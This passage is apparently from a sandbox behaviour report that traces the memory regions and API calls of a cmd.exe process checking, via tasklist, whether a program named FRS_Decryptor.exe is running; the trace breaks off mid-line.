os_parent_pid = "0xa5c" cmd_line = "C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7767 start_va = 0x910000 end_va = 0x92ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 7768 start_va = 0x930000 end_va = 0x931fff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Region: id = 7769 start_va = 0x940000 end_va = 0x94efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 7770 start_va = 0x950000 end_va = 0x98ffff entry_point = 0x0 region_type = private name = "private_0x0000000000950000" filename = "" Region: id = 7771 start_va = 0x990000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 7772 start_va = 0xa90000 end_va = 0xa93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 7773 start_va = 0xaa0000 end_va = 0xaa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 7774 start_va = 0xab0000 end_va = 0xab1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 7775 start_va = 0x1290000 end_va = 0x12defff entry_point = 0x1290000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 7776 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 7777 start_va = 0x7f1d0000 end_va = 0x7f1f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1d0000" filename = "" Region: id = 7778 start_va = 0x7f1f3000 end_va = 0x7f1f3fff entry_point = 0x0 region_type = private name = "private_0x000000007f1f3000" filename = "" Region: id = 7779 start_va = 0x7f1fc000 end_va = 0x7f1fefff entry_point = 0x0 region_type = private name = "private_0x000000007f1fc000" filename = "" Region: id = 7780 start_va = 0x7f1ff000 end_va = 0x7f1fffff entry_point = 0x0 region_type = private name = "private_0x000000007f1ff000" filename = "" Region: id = 7781 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7782 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 7783 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7784 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 7785 start_va = 0xb00000 end_va = 0xb0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 7786 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 7787 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 7788 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 7789 start_va = 0x910000 end_va = 0x91ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 7790 start_va = 0xb10000 end_va = 0xb8dfff entry_point = 0xb10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7791 start_va = 0xbd0000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 7792 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 7793 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 7794 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 7795 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 7796 start_va = 0x7f0d0000 end_va = 0x7f1cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0d0000" filename = "" Region: id = 7797 start_va = 0x920000 end_va = 0x923fff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 7798 start_va = 0xea0000 end_va = 0x1174fff entry_point = 0xea0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7817 start_va = 0x930000 end_va = 0x933fff entry_point = 0x0 region_type = private name = "private_0x0000000000930000" filename = "" Thread: id = 421 os_tid = 0x8bc [0138.018] GetModuleHandleA (lpModuleName=0x0) returned 0x1290000 [0138.018] __set_app_type (_Type=0x1) [0138.018] __p__fmode () returned 0x76ea1768 [0138.018] __p__commode () returned 0x76ea176c [0138.018] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x12a89b1) returned 0x0 [0138.018] __getmainargs (in: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0, _DoWildCard=0, _StartInfo=0x12b507c | out: _Argc=0x12b51d8, _Argv=0x12b51dc, _Env=0x12b51e0) returned 0 [0138.018] GetCurrentThreadId () returned 0x8bc [0138.018] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8bc) returned 0x34 [0138.018] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0138.018] GetProcAddress (hModule=0x74f70000, lpProcName="SetThreadUILanguage") returned 0x74fb3daf [0138.018] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.020] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0138.020] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0xa8fab8 | out: phkResult=0xa8fab8*=0x0) returned 0x2 [0138.020] VirtualQuery (in: lpAddress=0xa8fac7, lpBuffer=0xa8fa60, dwLength=0x1c | out: lpBuffer=0xa8fa60*(BaseAddress=0xa8f000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.020] VirtualQuery (in: lpAddress=0x990000, lpBuffer=0xa8fa60, dwLength=0x1c | out: lpBuffer=0xa8fa60*(BaseAddress=0x990000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0138.020] VirtualQuery (in: lpAddress=0x991000, lpBuffer=0xa8fa60, dwLength=0x1c | out: lpBuffer=0xa8fa60*(BaseAddress=0x991000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0138.020] VirtualQuery (in: lpAddress=0x993000, lpBuffer=0xa8fa60, dwLength=0x1c | out: lpBuffer=0xa8fa60*(BaseAddress=0x993000, AllocationBase=0x990000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0138.020] VirtualQuery (in: lpAddress=0xa90000, lpBuffer=0xa8fa60, dwLength=0x1c | out: lpBuffer=0xa8fa60*(BaseAddress=0xa90000, AllocationBase=0xa90000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0138.020] GetConsoleOutputCP () returned 0x1b5 [0138.020] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0138.021] SetConsoleCtrlHandler (HandlerRoutine=0x12b1877, Add=1) returned 1 [0138.021] _get_osfhandle (_FileHandle=1) returned 0x2ec [0138.021] SetConsoleMode (hConsoleHandle=0x2ec, dwMode=0x0) returned 0 [0138.021] _get_osfhandle (_FileHandle=1) returned 0x2ec [0138.021] GetConsoleMode (in: hConsoleHandle=0x2ec, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 0 [0138.021] _get_osfhandle (_FileHandle=0) returned 0x24 [0138.021] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0138.021] GetEnvironmentStringsW () returned 0xbd40c0* [0138.021] FreeEnvironmentStringsA (penv="=") returned 1 [0138.021] GetEnvironmentStringsW () returned 0xbd40c0* [0138.021] FreeEnvironmentStringsA (penv="=") returned 1 [0138.021] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa8ea08 | out: phkResult=0xa8ea08*=0x44) returned 0x0 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x0, lpData=0xa8ea14*=0x6c, lpcbData=0xa8ea0c*=0x1000) returned 0x2 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x1, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x0, lpData=0xa8ea14*=0x1, lpcbData=0xa8ea0c*=0x1000) returned 0x2 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x0, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x40, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x40, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.021] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x0, lpData=0xa8ea14*=0x40, lpcbData=0xa8ea0c*=0x1000) returned 0x2 [0138.022] RegCloseKey (hKey=0x44) returned 0x0 [0138.022] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xa8ea08 | out: phkResult=0xa8ea08*=0x44) returned 0x0 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x0, lpData=0xa8ea14*=0x40, lpcbData=0xa8ea0c*=0x1000) returned 0x2 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x1, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x0, lpData=0xa8ea14*=0x1, lpcbData=0xa8ea0c*=0x1000) returned 0x2 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x0, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x9, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x4, lpData=0xa8ea14*=0x9, lpcbData=0xa8ea0c*=0x4) returned 0x0 [0138.022] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0xa8ea10, lpData=0xa8ea14, lpcbData=0xa8ea0c*=0x1000 | out: lpType=0xa8ea10*=0x0, lpData=0xa8ea14*=0x9, lpcbData=0xa8ea0c*=0x1000) returned 0x2 [0138.022] RegCloseKey (hKey=0x44) returned 0x0 [0138.022] time (in: timer=0x0 | out: timer=0x0) returned 0x5aa500b5 [0138.022] srand (_Seed=0x5aa500b5) [0138.022] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0138.022] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tasklist|find /i \"FRS_Decryptor.exe\"" [0138.022] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0138.022] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xbd40c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0138.022] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0138.022] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0138.022] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0138.022] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0138.022] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0138.022] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0138.022] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0138.022] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0138.022] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0138.022] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0138.022] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0138.022] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0138.022] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0138.022] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xa8f7e8 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0138.022] GetFullPathNameW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", nBufferLength=0x104, lpBuffer=0xa8f7e8, lpFilePart=0xa8f7e4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xa8f7e4*="Desktop") returned 0x1c [0138.023] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0138.023] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa8f560 | out: lpFindFileData=0xa8f560) returned 0xbd42d8 [0138.023] FindClose (in: hFindFile=0xbd42d8 | out: hFindFile=0xbd42d8) returned 1 [0138.023] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp", lpFindFileData=0xa8f560 | out: lpFindFileData=0xa8f560) returned 0xbd42d8 [0138.023] FindClose (in: hFindFile=0xbd42d8 | out: hFindFile=0xbd42d8) returned 1 [0138.023] _wcsnicmp (_String1="5JGHKO~1", _String2="5JgHKoaOfdp", _MaxCount=0xb) returned 29 [0138.023] FindFirstFileW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFindFileData=0xa8f560 | out: lpFindFileData=0xa8f560) returned 0xbd42d8 [0138.023] FindClose (in: hFindFile=0xbd42d8 | out: hFindFile=0xbd42d8) returned 1 [0138.023] GetFileAttributesW (lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 0x11 [0138.023] SetCurrentDirectoryW (lpPathName="C:\\Users\\5JgHKoaOfdp\\Desktop" (normalized: "c:\\users\\5jghkoaofdp\\desktop")) returned 1 [0138.023] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 1 [0138.023] GetEnvironmentStringsW () returned 0xbd6190* [0138.023] FreeEnvironmentStringsA (penv="=") returned 1 [0138.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12b5a20 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop") returned 0x1c [0138.024] GetConsoleOutputCP () returned 0x1b5 [0138.024] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0138.024] GetUserDefaultLCID () returned 0x409 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12b5560, cchData=8 | out: lpLCData=":") returned 2 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xa8f914, cchData=128 | out: lpLCData="0") returned 2 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xa8f914, cchData=128 | out: lpLCData="0") returned 2 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xa8f914, cchData=128 | out: lpLCData="1") returned 2 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12b5570, cchData=8 | out: lpLCData="/") returned 2 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12b5660, cchData=32 | out: lpLCData="Mon") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12b56a0, cchData=32 | out: lpLCData="Tue") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12b56e0, cchData=32 | out: lpLCData="Wed") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12b5720, cchData=32 | out: lpLCData="Thu") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12b5760, cchData=32 | out: lpLCData="Fri") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12b57a0, cchData=32 | out: lpLCData="Sat") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12b57e0, cchData=32 | out: lpLCData="Sun") returned 4 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12b5580, cchData=8 | out: lpLCData=".") returned 2 [0138.024] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12b5590, cchData=8 | out: lpLCData=",") returned 2 [0138.024] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0138.025] GetConsoleTitleW (in: lpConsoleTitle=0xbd4e28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0138.025] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74f70000 [0138.026] GetProcAddress (hModule=0x74f70000, lpProcName="CopyFileExW") returned 0x74f95d45 [0138.026] GetProcAddress (hModule=0x74f70000, lpProcName="IsDebuggerPresent") returned 0x74f8d16f [0138.026] GetProcAddress (hModule=0x74f70000, lpProcName="SetConsoleInputExeNameW") returned 0x759cdda0 [0138.026] _wcsicmp (_String1="tasklist", _String2=")") returned 75 [0138.026] _wcsicmp (_String1="FOR", _String2="tasklist") returned -14 [0138.026] _wcsicmp (_String1="FOR/?", _String2="tasklist") returned -14 [0138.026] _wcsicmp (_String1="IF", _String2="tasklist") returned -11 [0138.026] _wcsicmp (_String1="IF/?", _String2="tasklist") returned -11 [0138.026] _wcsicmp (_String1="REM", _String2="tasklist") returned -2 [0138.026] _wcsicmp (_String1="REM/?", _String2="tasklist") returned -2 [0138.027] _wcsicmp (_String1="FOR", _String2="find") returned 6 [0138.027] _wcsicmp (_String1="FOR/?", _String2="find") returned 6 [0138.027] _wcsicmp (_String1="IF", _String2="find") returned 3 [0138.027] _wcsicmp (_String1="IF/?", _String2="find") returned 3 [0138.027] _wcsicmp (_String1="REM", _String2="find") returned 12 [0138.027] _wcsicmp (_String1="REM/?", _String2="find") returned 12 [0138.028] _pipe (in: _PtHandles=0xbd51f0, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0xbd51f0) returned 0 [0138.028] _dup (_FileHandle=1) returned 5 [0138.028] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0138.028] _close (_FileHandle=4) returned 0 [0138.028] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0138.028] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0138.028] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0138.028] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0138.028] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0138.028] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0138.028] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0138.028] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0138.028] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0138.028] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0138.028] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0138.028] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0138.028] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0138.028] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0138.028] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0138.029] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0138.029] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0138.029] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0138.029] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0138.029] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0138.029] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0138.029] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0138.029] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0138.029] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0138.029] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0138.029] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0138.029] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0138.029] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0138.029] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0138.029] _wcsicmp (_String1="tasklist", _String2="KEYS") returned 9 [0138.029] _wcsicmp (_String1="tasklist", _String2="MOVE") returned 7 [0138.029] _wcsicmp (_String1="tasklist", _String2="PUSHD") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="POPD") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="ASSOC") returned 19 [0138.029] _wcsicmp (_String1="tasklist", _String2="FTYPE") returned 14 [0138.029] _wcsicmp (_String1="tasklist", _String2="BREAK") returned 18 [0138.029] _wcsicmp (_String1="tasklist", _String2="COLOR") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="MKLINK") returned 7 [0138.029] _wcsicmp (_String1="tasklist", _String2="DIR") returned 16 [0138.029] _wcsicmp (_String1="tasklist", _String2="ERASE") returned 15 [0138.029] _wcsicmp (_String1="tasklist", _String2="DEL") returned 16 [0138.029] _wcsicmp (_String1="tasklist", _String2="TYPE") returned -24 [0138.029] _wcsicmp (_String1="tasklist", _String2="COPY") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="CD") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="CHDIR") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="RENAME") returned 2 [0138.029] _wcsicmp (_String1="tasklist", _String2="REN") returned 2 [0138.029] _wcsicmp (_String1="tasklist", _String2="ECHO") returned 15 [0138.029] _wcsicmp (_String1="tasklist", _String2="SET") returned 1 [0138.029] _wcsicmp (_String1="tasklist", _String2="PAUSE") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="DATE") returned 16 [0138.029] _wcsicmp (_String1="tasklist", _String2="TIME") returned -8 [0138.029] _wcsicmp (_String1="tasklist", _String2="PROMPT") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="MD") returned 7 [0138.029] _wcsicmp (_String1="tasklist", _String2="MKDIR") returned 7 [0138.029] _wcsicmp (_String1="tasklist", _String2="RD") returned 2 [0138.029] _wcsicmp (_String1="tasklist", _String2="RMDIR") returned 2 [0138.029] _wcsicmp (_String1="tasklist", _String2="PATH") returned 4 [0138.029] _wcsicmp (_String1="tasklist", _String2="GOTO") returned 13 [0138.029] _wcsicmp (_String1="tasklist", _String2="SHIFT") returned 1 [0138.029] _wcsicmp (_String1="tasklist", _String2="CLS") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="CALL") returned 17 [0138.029] _wcsicmp (_String1="tasklist", _String2="VERIFY") returned -2 [0138.029] _wcsicmp (_String1="tasklist", _String2="VER") returned -2 [0138.029] _wcsicmp (_String1="tasklist", _String2="VOL") returned -2 [0138.029] _wcsicmp (_String1="tasklist", _String2="EXIT") returned 15 [0138.029] _wcsicmp (_String1="tasklist", _String2="SETLOCAL") returned 1 [0138.030] _wcsicmp (_String1="tasklist", _String2="ENDLOCAL") returned 15 [0138.030] _wcsicmp (_String1="tasklist", _String2="TITLE") returned -8 [0138.030] _wcsicmp (_String1="tasklist", _String2="START") returned 1 [0138.030] _wcsicmp (_String1="tasklist", _String2="DPATH") returned 16 [0138.030] _wcsicmp 